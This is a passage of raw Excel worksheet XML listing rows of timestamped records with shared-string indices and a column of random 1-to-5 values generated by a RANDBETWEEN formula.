      <c r="A1426" s="1">
        <v>43531.18273148148</v>
      </c>
      <c r="B1426" t="s">
        <v>9</v>
      </c>
      <c r="C1426" t="s">
        <v>41</v>
      </c>
      <c r="E1426" t="s">
        <v>1518</v>
      </c>
      <c r="F1426">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1427" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1427" s="1">
        <v>43531.067071759258</v>
      </c>
      <c r="B1427" t="s">
        <v>19</v>
      </c>
      <c r="C1427" t="s">
        <v>139</v>
      </c>
      <c r="E1427" t="s">
        <v>1519</v>
      </c>
      <c r="F1427">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1428" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1428" s="1">
        <v>43531.036793981482</v>
      </c>
      <c r="B1428" t="s">
        <v>19</v>
      </c>
      <c r="C1428" t="s">
        <v>724</v>
      </c>
      <c r="E1428" s="2" t="s">
        <v>1520</v>
      </c>
      <c r="F1428">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1429" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1429" s="1">
        <v>43530.947314814817</v>
      </c>
      <c r="B1429" t="s">
        <v>19</v>
      </c>
      <c r="C1429" t="s">
        <v>139</v>
      </c>
      <c r="E1429" s="2" t="s">
        <v>1521</v>
      </c>
      <c r="F1429">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1430" s="1">
        <v>43530.915219907409</v>
      </c>
      <c r="B1430" t="s">
        <v>19</v>
      </c>
      <c r="C1430" t="s">
        <v>139</v>
      </c>
      <c r="E1430" t="s">
        <v>1522</v>
      </c>
      <c r="F1430">
        <f t="shared" ca="1" si="22"/>
        <v>1</v>
      </c>
    </row>
    <row r="1431" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1431" s="1">
        <v>43530.907326388886</v>
      </c>
      <c r="B1431" t="s">
        <v>1305</v>
      </c>
      <c r="C1431" t="s">
        <v>41</v>
      </c>
      <c r="D1431" t="s">
        <v>312</v>
      </c>
      <c r="E1431" s="2" t="s">
        <v>1523</v>
      </c>
      <c r="F1431">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1432" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A1432" s="1">
        <v>43530.903171296297</v>
      </c>
      <c r="B1432" t="s">
        <v>5</v>
      </c>
      <c r="C1432" t="s">
        <v>6</v>
      </c>
      <c r="D1432" t="s">
        <v>25</v>
      </c>
      <c r="E1432" s="2" t="s">
        <v>1524</v>
      </c>
      <c r="F1432">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1433" s="1">
        <v>43530.884062500001</v>
      </c>
      <c r="B1433" t="s">
        <v>19</v>
      </c>
      <c r="C1433" t="s">
        <v>140</v>
      </c>
      <c r="D1433" t="s">
        <v>847</v>
      </c>
      <c r="E1433" t="s">
        <v>1525</v>
      </c>
      <c r="F1433">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1434" s="1">
        <v>43530.877511574072</v>
      </c>
      <c r="B1434" t="s">
        <v>19</v>
      </c>
      <c r="C1434" t="s">
        <v>314</v>
      </c>
      <c r="E1434" t="s">
        <v>1526</v>
      </c>
      <c r="F1434">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1435" s="1">
        <v>43530.769270833334</v>
      </c>
      <c r="B1435" t="s">
        <v>1305</v>
      </c>
      <c r="C1435" t="s">
        <v>10</v>
      </c>
      <c r="D1435" t="s">
        <v>158</v>
      </c>
      <c r="E1435" t="s">
        <v>1527</v>
      </c>
      <c r="F1435">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1436" s="1">
        <v>43530.754884259259</v>
      </c>
      <c r="B1436" t="s">
        <v>13</v>
      </c>
      <c r="C1436" t="s">
        <v>10</v>
      </c>
      <c r="D1436" t="s">
        <v>6</v>
      </c>
      <c r="E1436" t="s">
        <v>1528</v>
      </c>
      <c r="F1436">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1437" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1437" s="1">
        <v>43530.744768518518</v>
      </c>
      <c r="B1437" t="s">
        <v>19</v>
      </c>
      <c r="C1437" t="s">
        <v>82</v>
      </c>
      <c r="E1437" s="2" t="s">
        <v>1529</v>
      </c>
      <c r="F1437">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1438" s="1">
        <v>43530.719837962963</v>
      </c>
      <c r="B1438" t="s">
        <v>13</v>
      </c>
      <c r="C1438" t="s">
        <v>10</v>
      </c>
      <c r="D1438" t="s">
        <v>158</v>
      </c>
      <c r="E1438" t="s">
        <v>1530</v>
      </c>
      <c r="F1438">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1439" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1439" s="1">
        <v>43530.713553240741</v>
      </c>
      <c r="B1439" t="s">
        <v>19</v>
      </c>
      <c r="C1439" t="s">
        <v>10</v>
      </c>
      <c r="D1439" t="s">
        <v>17</v>
      </c>
      <c r="E1439" s="2" t="s">
        <v>1531</v>
      </c>
      <c r="F1439">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1440" s="1">
        <v>43530.69427083333</v>
      </c>
      <c r="B1440" t="s">
        <v>19</v>
      </c>
      <c r="C1440" t="s">
        <v>10</v>
      </c>
      <c r="D1440" t="s">
        <v>46</v>
      </c>
      <c r="E1440" t="s">
        <v>1532</v>
      </c>
      <c r="F1440">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1441" s="1">
        <v>43530.690891203703</v>
      </c>
      <c r="B1441" t="s">
        <v>19</v>
      </c>
      <c r="C1441" t="s">
        <v>10</v>
      </c>
      <c r="D1441" t="s">
        <v>6</v>
      </c>
      <c r="E1441" t="s">
        <v>1533</v>
      </c>
      <c r="F1441">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1442" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1442" s="1">
        <v>43530.690138888887</v>
      </c>
      <c r="B1442" t="s">
        <v>13</v>
      </c>
      <c r="C1442" t="s">
        <v>10</v>
      </c>
      <c r="D1442" t="s">
        <v>6</v>
      </c>
      <c r="E1442" s="2" t="s">
        <v>1534</v>
      </c>
      <c r="F1442">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1443" s="1">
        <v>43530.683136574073</v>
      </c>
      <c r="B1443" t="s">
        <v>5</v>
      </c>
      <c r="C1443" t="s">
        <v>10</v>
      </c>
      <c r="D1443" t="s">
        <v>39</v>
      </c>
      <c r="E1443" t="s">
        <v>1535</v>
      </c>
      <c r="F1443">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1444" s="1">
        <v>43530.652708333335</v>
      </c>
      <c r="B1444" t="s">
        <v>19</v>
      </c>
      <c r="C1444" t="s">
        <v>144</v>
      </c>
      <c r="E1444" t="s">
        <v>1536</v>
      </c>
      <c r="F1444">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1445" s="1">
        <v>43530.642384259256</v>
      </c>
      <c r="B1445" t="s">
        <v>9</v>
      </c>
      <c r="C1445" t="s">
        <v>10</v>
      </c>
      <c r="D1445" t="s">
        <v>11</v>
      </c>
      <c r="E1445" t="s">
        <v>1537</v>
      </c>
      <c r="F1445">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1446" s="1">
        <v>43530.641284722224</v>
      </c>
      <c r="B1446" t="s">
        <v>5</v>
      </c>
      <c r="C1446" t="s">
        <v>10</v>
      </c>
      <c r="D1446" t="s">
        <v>86</v>
      </c>
      <c r="E1446" t="s">
        <v>1538</v>
      </c>
      <c r="F1446">
        <f t="shared" ca="1" si="22"/>
        <v>1</v>
      </c>
    </row>
    <row r="1447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1447" s="1">
        <v>43530.638831018521</v>
      </c>
      <c r="B1447" t="s">
        <v>5</v>
      </c>
      <c r="C1447" t="s">
        <v>6</v>
      </c>
      <c r="D1447" t="s">
        <v>25</v>
      </c>
      <c r="E1447" t="s">
        <v>1539</v>
      </c>
      <c r="F1447">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1448" s="1">
        <v>43530.629363425927</v>
      </c>
      <c r="B1448" t="s">
        <v>5</v>
      </c>
      <c r="C1448" t="s">
        <v>10</v>
      </c>
      <c r="D1448" t="s">
        <v>52</v>
      </c>
      <c r="E1448" t="s">
        <v>1540</v>
      </c>
      <c r="F1448">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1449" s="1">
        <v>43530.616932870369</v>
      </c>
      <c r="B1449" t="s">
        <v>19</v>
      </c>
      <c r="C1449" t="s">
        <v>10</v>
      </c>
      <c r="D1449" t="s">
        <v>17</v>
      </c>
      <c r="E1449" t="s">
        <v>1541</v>
      </c>
      <c r="F1449">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1450" s="1">
        <v>43530.615636574075</v>
      </c>
      <c r="B1450" t="s">
        <v>5</v>
      </c>
      <c r="C1450" t="s">
        <v>10</v>
      </c>
      <c r="D1450" t="s">
        <v>6</v>
      </c>
      <c r="E1450" t="s">
        <v>1542</v>
      </c>
      <c r="F1450">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1451" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1451" s="1">
        <v>43530.599305555559</v>
      </c>
      <c r="B1451" t="s">
        <v>5</v>
      </c>
      <c r="C1451" t="s">
        <v>10</v>
      </c>
      <c r="D1451" t="s">
        <v>17</v>
      </c>
      <c r="E1451" s="2" t="s">
        <v>1543</v>
      </c>
      <c r="F1451">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1452" s="1">
        <v>43530.581979166665</v>
      </c>
      <c r="B1452" t="s">
        <v>9</v>
      </c>
      <c r="C1452" t="s">
        <v>10</v>
      </c>
      <c r="D1452" t="s">
        <v>86</v>
      </c>
      <c r="E1452" t="s">
        <v>1544</v>
      </c>
      <c r="F1452">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1453" s="1">
        <v>43530.567997685182</v>
      </c>
      <c r="B1453" t="s">
        <v>13</v>
      </c>
      <c r="C1453" t="s">
        <v>10</v>
      </c>
      <c r="D1453" t="s">
        <v>86</v>
      </c>
      <c r="E1453" t="s">
        <v>1544</v>
      </c>
      <c r="F1453">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1454" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1454" s="1">
        <v>43530.565393518518</v>
      </c>
      <c r="B1454" t="s">
        <v>13</v>
      </c>
      <c r="C1454" t="s">
        <v>10</v>
      </c>
      <c r="D1454" t="s">
        <v>39</v>
      </c>
      <c r="E1454" s="2" t="s">
        <v>1545</v>
      </c>
      <c r="F1454">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1455" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1455" s="1">
        <v>43530.556215277778</v>
      </c>
      <c r="B1455" t="s">
        <v>5</v>
      </c>
      <c r="C1455" t="s">
        <v>243</v>
      </c>
      <c r="E1455" s="2" t="s">
        <v>1546</v>
      </c>
      <c r="F1455">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1456" s="1">
        <v>43530.555104166669</v>
      </c>
      <c r="B1456" t="s">
        <v>1305</v>
      </c>
      <c r="C1456" t="s">
        <v>6</v>
      </c>
      <c r="D1456" t="s">
        <v>25</v>
      </c>
      <c r="E1456" t="s">
        <v>828</v>
      </c>
      <c r="F1456">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1457" s="1">
        <v>43530.553888888891</v>
      </c>
      <c r="B1457" t="s">
        <v>1305</v>
      </c>
      <c r="C1457" t="s">
        <v>6</v>
      </c>
      <c r="D1457" t="s">
        <v>25</v>
      </c>
      <c r="E1457" t="s">
        <v>828</v>
      </c>
      <c r="F1457">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1458" s="1">
        <v>43530.553703703707</v>
      </c>
      <c r="B1458" t="s">
        <v>1305</v>
      </c>
      <c r="C1458" t="s">
        <v>6</v>
      </c>
      <c r="D1458" t="s">
        <v>25</v>
      </c>
      <c r="E1458" t="s">
        <v>1547</v>
      </c>
      <c r="F1458">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1459" s="1">
        <v>43530.553194444445</v>
      </c>
      <c r="B1459" t="s">
        <v>1305</v>
      </c>
      <c r="C1459" t="s">
        <v>6</v>
      </c>
      <c r="D1459" t="s">
        <v>25</v>
      </c>
      <c r="E1459" t="s">
        <v>828</v>
      </c>
      <c r="F1459">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1460" s="1">
        <v>43530.541388888887</v>
      </c>
      <c r="B1460" t="s">
        <v>19</v>
      </c>
      <c r="C1460" t="s">
        <v>10</v>
      </c>
      <c r="D1460" t="s">
        <v>86</v>
      </c>
      <c r="E1460" t="s">
        <v>1544</v>
      </c>
      <c r="F1460">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1461" s="1">
        <v>43530.531354166669</v>
      </c>
      <c r="B1461" t="s">
        <v>5</v>
      </c>
      <c r="C1461" t="s">
        <v>10</v>
      </c>
      <c r="D1461" t="s">
        <v>92</v>
      </c>
      <c r="E1461" t="s">
        <v>1548</v>
      </c>
      <c r="F1461">
        <f t="shared" ca="1" si="22"/>
        <v>1</v>
      </c>
    </row>
    <row r="1462" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1462" s="1">
        <v>43530.528564814813</v>
      </c>
      <c r="B1462" t="s">
        <v>5</v>
      </c>
      <c r="C1462" t="s">
        <v>10</v>
      </c>
      <c r="D1462" t="s">
        <v>17</v>
      </c>
      <c r="E1462" s="2" t="s">
        <v>1549</v>
      </c>
      <c r="F1462">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1463" s="1">
        <v>43530.520439814813</v>
      </c>
      <c r="B1463" t="s">
        <v>9</v>
      </c>
      <c r="C1463" t="s">
        <v>10</v>
      </c>
      <c r="D1463" t="s">
        <v>158</v>
      </c>
      <c r="E1463" t="s">
        <v>1550</v>
      </c>
      <c r="F1463">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1464" s="1">
        <v>43530.517835648148</v>
      </c>
      <c r="B1464" t="s">
        <v>13</v>
      </c>
      <c r="C1464" t="s">
        <v>10</v>
      </c>
      <c r="D1464" t="s">
        <v>39</v>
      </c>
      <c r="E1464" t="s">
        <v>1551</v>
      </c>
      <c r="F1464">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1465" s="1">
        <v>43530.512870370374</v>
      </c>
      <c r="B1465" t="s">
        <v>13</v>
      </c>
      <c r="C1465" t="s">
        <v>10</v>
      </c>
      <c r="D1465" t="s">
        <v>271</v>
      </c>
      <c r="E1465" t="s">
        <v>1552</v>
      </c>
      <c r="F1465">
        <f t="shared" ca="1" si="22"/>
        <v>3</v>
      </c>
    </row>
    <row r="1466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1466" s="1">
        <v>43530.506851851853</v>
      </c>
      <c r="B1466" t="s">
        <v>19</v>
      </c>
      <c r="C1466" t="s">
        <v>48</v>
      </c>
      <c r="E1466" t="s">
        <v>1553</v>
      </c>
      <c r="F1466">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1467" s="1">
        <v>43530.497453703705</v>
      </c>
      <c r="B1467" t="s">
        <v>13</v>
      </c>
      <c r="C1467" t="s">
        <v>60</v>
      </c>
      <c r="E1467" t="s">
        <v>1554</v>
      </c>
      <c r="F1467">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1468" s="1">
        <v>43530.495243055557</v>
      </c>
      <c r="B1468" t="s">
        <v>1305</v>
      </c>
      <c r="C1468" t="s">
        <v>6</v>
      </c>
      <c r="D1468" t="s">
        <v>25</v>
      </c>
      <c r="E1468" t="s">
        <v>828</v>
      </c>
      <c r="F1468">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1469" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1469" s="1">
        <v>43530.491354166668</v>
      </c>
      <c r="B1469" t="s">
        <v>5</v>
      </c>
      <c r="C1469" t="s">
        <v>48</v>
      </c>
      <c r="E1469" s="2" t="s">
        <v>1555</v>
      </c>
      <c r="F1469">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1470" s="1">
        <v>43530.489722222221</v>
      </c>
      <c r="B1470" t="s">
        <v>1305</v>
      </c>
      <c r="C1470" t="s">
        <v>6</v>
      </c>
      <c r="D1470" t="s">
        <v>25</v>
      </c>
      <c r="E1470" t="s">
        <v>1556</v>
      </c>
      <c r="F1470">
        <f t="shared" ca="1" si="22"/>
        <v>4</v>
      </c>
    </row>
    <row r="1471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1471" s="1">
        <v>43530.48847222222</v>
      </c>
      <c r="B1471" t="s">
        <v>1305</v>
      </c>
      <c r="C1471" t="s">
        <v>6</v>
      </c>
      <c r="D1471" t="s">
        <v>25</v>
      </c>
      <c r="E1471" t="s">
        <v>1557</v>
      </c>
      <c r="F1471">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1472" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1472" s="1">
        <v>43530.487881944442</v>
      </c>
      <c r="B1472" t="s">
        <v>19</v>
      </c>
      <c r="C1472" t="s">
        <v>10</v>
      </c>
      <c r="D1472" t="s">
        <v>112</v>
      </c>
      <c r="E1472" s="2" t="s">
        <v>1558</v>
      </c>
      <c r="F1472">
        <f t="shared" ca="1" si="22"/>
        <v>5</v>
      </c>
    </row>
    <row r="1473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1473" s="1">
        <v>43530.487407407411</v>
      </c>
      <c r="B1473" t="s">
        <v>13</v>
      </c>
      <c r="C1473" t="s">
        <v>10</v>
      </c>
      <c r="D1473" t="s">
        <v>80</v>
      </c>
      <c r="E1473" t="s">
        <v>1559</v>
      </c>
      <c r="F1473">
        <f t="shared" ca="1" si="22"/>
        <v>2</v>
      </c>
    </row>
    <row r="1474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1474" s="1">
        <v>43530.486180555556</v>
      </c>
      <c r="B1474" t="s">
        <v>1305</v>
      </c>
      <c r="C1474" t="s">
        <v>6</v>
      </c>
      <c r="D1474" t="s">
        <v>25</v>
      </c>
      <c r="E1474" t="s">
        <v>829</v>
      </c>
      <c r="F1474">
        <f t="shared" ref="F1474:F1537" ca="1" si="23">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="1475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1475" s="1">
        <v>43530.482615740744</v>
      </c>
      <c r="B1475" t="s">
        <v>19</v>
      </c>
      <c r="C1475" t="s">
        <v>10</v>
      </c>
      <c r="D1475" t="s">
        <v>1056</v>
      </c>
      <c r="E1475" t="s">
        <v>1560</v>
      </c>
      <c r="F1475">
        <f t="shared" ca="1" si="23"/>
        <v>4</v>
      </c>
    </row>
    <row r="1476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1476" s="1">
        <v>43530.433749999997</v>
      </c>
      <c r="B1476" t="s">
        <v>19</v>
      </c>
      <c r="C1476" t="s">
        <v>65</v>
      </c>
      <c r="E1476" t="s">
        <v>1561</v>
      </c>
      <c r="F1476">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1477" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1477" s="1">
        <v>43530.427916666667</v>
      </c>
      <c r="B1477" t="s">
        <v>1305</v>
      </c>
      <c r="C1477" t="s">
        <v>6</v>
      </c>
      <c r="D1477" t="s">
        <v>25</v>
      </c>
      <c r="E1477" s="2" t="s">
        <v>1562</v>
      </c>
      <c r="F1477">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1478" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1478" s="1">
        <v>43530.427870370368</v>
      </c>
      <c r="B1478" t="s">
        <v>1305</v>
      </c>
      <c r="C1478" t="s">
        <v>6</v>
      </c>
      <c r="D1478" t="s">
        <v>25</v>
      </c>
      <c r="E1478" s="2" t="s">
        <v>1562</v>
      </c>
      <c r="F1478">
        <f t="shared" ca="1" si="23"/>
        <v>4</v>
      </c>
    </row>
    <row r="1479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1479" s="1">
        <v>43530.408946759257</v>
      </c>
      <c r="B1479" t="s">
        <v>13</v>
      </c>
      <c r="C1479" t="s">
        <v>10</v>
      </c>
      <c r="D1479" t="s">
        <v>163</v>
      </c>
      <c r="E1479" t="s">
        <v>1563</v>
      </c>
      <c r="F1479">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1480" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1480" s="1">
        <v>43530.403541666667</v>
      </c>
      <c r="B1480" t="s">
        <v>13</v>
      </c>
      <c r="C1480" t="s">
        <v>48</v>
      </c>
      <c r="E1480" s="2" t="s">
        <v>1564</v>
      </c>
      <c r="F1480">
        <f t="shared" ca="1" si="23"/>
        <v>4</v>
      </c>
    </row>
    <row r="1481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1481" s="1">
        <v>43530.395092592589</v>
      </c>
      <c r="B1481" t="s">
        <v>13</v>
      </c>
      <c r="C1481" t="s">
        <v>6</v>
      </c>
      <c r="D1481" t="s">
        <v>194</v>
      </c>
      <c r="E1481" t="s">
        <v>1565</v>
      </c>
      <c r="F1481">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1482" s="1">
        <v>43530.392476851855</v>
      </c>
      <c r="B1482" t="s">
        <v>13</v>
      </c>
      <c r="C1482" t="s">
        <v>10</v>
      </c>
      <c r="D1482" t="s">
        <v>271</v>
      </c>
      <c r="E1482" t="s">
        <v>1566</v>
      </c>
      <c r="F1482">
        <f t="shared" ca="1" si="23"/>
        <v>3</v>
      </c>
    </row>
    <row r="1483" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1483" s="1">
        <v>43530.380925925929</v>
      </c>
      <c r="B1483" t="s">
        <v>13</v>
      </c>
      <c r="C1483" t="s">
        <v>10</v>
      </c>
      <c r="D1483" t="s">
        <v>23</v>
      </c>
      <c r="E1483" s="2" t="s">
        <v>1567</v>
      </c>
      <c r="F1483">
        <f t="shared" ca="1" si="23"/>
        <v>4</v>
      </c>
    </row>
    <row r="1484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1484" s="1">
        <v>43530.376666666663</v>
      </c>
      <c r="B1484" t="s">
        <v>1305</v>
      </c>
      <c r="C1484" t="s">
        <v>10</v>
      </c>
      <c r="D1484" t="s">
        <v>23</v>
      </c>
      <c r="E1484" t="s">
        <v>1568</v>
      </c>
      <c r="F1484">
        <f t="shared" ca="1" si="23"/>
        <v>4</v>
      </c>
    </row>
    <row r="1485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1485" s="1">
        <v>43530.376388888886</v>
      </c>
      <c r="B1485" t="s">
        <v>19</v>
      </c>
      <c r="C1485" t="s">
        <v>48</v>
      </c>
      <c r="E1485" t="s">
        <v>1569</v>
      </c>
      <c r="F1485">
        <f t="shared" ca="1" si="23"/>
        <v>5</v>
      </c>
    </row>
    <row r="1486" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A1486" s="1">
        <v>43530.342268518521</v>
      </c>
      <c r="B1486" t="s">
        <v>5</v>
      </c>
      <c r="C1486" t="s">
        <v>10</v>
      </c>
      <c r="D1486" t="s">
        <v>36</v>
      </c>
      <c r="E1486" s="2" t="s">
        <v>1570</v>
      </c>
      <c r="F1486">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1487" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1487" s="1">
        <v>43530.339907407404</v>
      </c>
      <c r="B1487" t="s">
        <v>19</v>
      </c>
      <c r="C1487" t="s">
        <v>41</v>
      </c>
      <c r="E1487" s="2" t="s">
        <v>1571</v>
      </c>
      <c r="F1487">
        <f t="shared" ca="1" si="23"/>
        <v>1</v>
      </c>
    </row>
    <row r="1488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1488" s="1">
        <v>43530.313101851854</v>
      </c>
      <c r="B1488" t="s">
        <v>1305</v>
      </c>
      <c r="C1488" t="s">
        <v>63</v>
      </c>
      <c r="E1488" t="s">
        <v>1572</v>
      </c>
      <c r="F1488">
        <f t="shared" ca="1" si="23"/>
        <v>4</v>
      </c>
    </row>
    <row r="1489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1489" s="1">
        <v>43530.312719907408</v>
      </c>
      <c r="B1489" t="s">
        <v>1305</v>
      </c>
      <c r="C1489" t="s">
        <v>63</v>
      </c>
      <c r="E1489" t="s">
        <v>1572</v>
      </c>
      <c r="F1489">
        <f t="shared" ca="1" si="23"/>
        <v>3</v>
      </c>
    </row>
    <row r="1490" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1490" s="1">
        <v>43530.312048611115</v>
      </c>
      <c r="B1490" t="s">
        <v>5</v>
      </c>
      <c r="C1490" t="s">
        <v>69</v>
      </c>
      <c r="E1490" s="2" t="s">
        <v>1573</v>
      </c>
      <c r="F1490">
        <f t="shared" ca="1" si="23"/>
        <v>1</v>
      </c>
    </row>
    <row r="1491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1491" s="1">
        <v>43530.300497685188</v>
      </c>
      <c r="B1491" t="s">
        <v>5</v>
      </c>
      <c r="C1491" t="s">
        <v>124</v>
      </c>
      <c r="E1491" t="s">
        <v>1574</v>
      </c>
      <c r="F1491">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1492" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1492" s="1">
        <v>43530.280243055553</v>
      </c>
      <c r="B1492" t="s">
        <v>13</v>
      </c>
      <c r="C1492" t="s">
        <v>10</v>
      </c>
      <c r="D1492" t="s">
        <v>89</v>
      </c>
      <c r="E1492" s="2" t="s">
        <v>1575</v>
      </c>
      <c r="F1492">
        <f t="shared" ca="1" si="23"/>
        <v>2</v>
      </c>
    </row>
    <row r="1493" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1493" s="1">
        <v>43530.25675925926</v>
      </c>
      <c r="B1493" t="s">
        <v>13</v>
      </c>
      <c r="C1493" t="s">
        <v>178</v>
      </c>
      <c r="E1493" s="2" t="s">
        <v>1576</v>
